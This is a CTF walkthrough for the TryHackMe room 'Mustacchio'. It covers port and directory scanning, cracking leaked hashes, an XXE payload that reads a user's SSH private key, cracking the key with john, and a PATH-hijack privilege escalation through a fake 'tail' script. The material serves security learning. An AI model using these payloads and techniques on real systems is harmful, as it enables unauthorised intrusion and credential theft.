Mustacchio

Room Link: https://tryhackme.com/room/mustacchio

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

port 8765 found which is running nginx

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

There is a users.bak file in the custom folder

It's a bit messy but it appears to be a username and password hash. I put it through crackstation

TCP/8765 - HTTP

gobuster dir -u http://$VICTIM:8765 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

Username: admin
Password: bulldog19

Initial Shell

In the source code there's two interesting places to look

Seems like a waste but we now know the format how to submit something on the site

Input

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could\u2019ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could\u2019ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>

Input

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>

Kali

python /opt/john/ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
chmod 600 id_rsa
ssh -v -i id_rsa barry@$VICTIM
Password: urieljames

Privilege Escalation

We find a program owned by root in joes folder. When we run strings on it we can see tail command is being ran but it is not using full path so we can exploit this.

Victim

cd /home/joe
ls -lah
strings live_log

Victim

cd /tmp

cat > tail << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
chmod +x tail

export PATH=/tmp/:$PATH
/home/joe/live_log